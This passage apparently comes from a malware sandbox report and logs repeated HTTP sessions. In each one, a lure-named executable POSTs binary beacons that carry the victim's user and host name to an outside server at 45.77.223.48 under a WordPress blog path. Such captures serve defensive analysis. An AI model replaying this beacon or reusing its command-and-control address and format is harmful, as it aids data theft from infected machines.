                                              Apr 25, 2024 09:43:03.228997946 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:03.229038954 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:03.229095936 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              51192.168.2.44980145.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:04.035270929 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:04.162424088 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:04.977320910 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:04 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:04.977344990 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:04.977471113 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:04.986962080 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:04.987298012 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:04.987370014 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:04.987467051 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:04.987651110 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:04.987700939 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:04.987760067 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              52192.168.2.44980245.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:05.247701883 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:05.373589993 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:06.233783960 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:05 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:06.234366894 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:06.234379053 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:06.244445086 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:06.244833946 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:06.244973898 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:06.245279074 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:43:06.245290995 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 25, 2024 09:43:06.245495081 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 25, 2024 09:43:06.245506048 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                              Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.2.44980345.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:06.504867077 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:06.632006884 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:07.502393961 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:06 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:07.502492905 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:07.511431932 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:07.511869907 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:07.511919975 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:07.512092113 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:07.512553930 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:07.512587070 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:07.512625933 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:43:07.512667894 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              54192.168.2.44980445.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:07.780738115 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:07.911998987 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:08.720006943 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:07 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:08.720118046 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:08.720381975 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:08.729425907 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:08.729669094 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:08.729809999 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:08.729911089 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:08.730053902 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:08.730076075 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:08.730185986 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              55192.168.2.44980545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:08.999268055 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:09.130069971 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:09.948549986 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:09 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
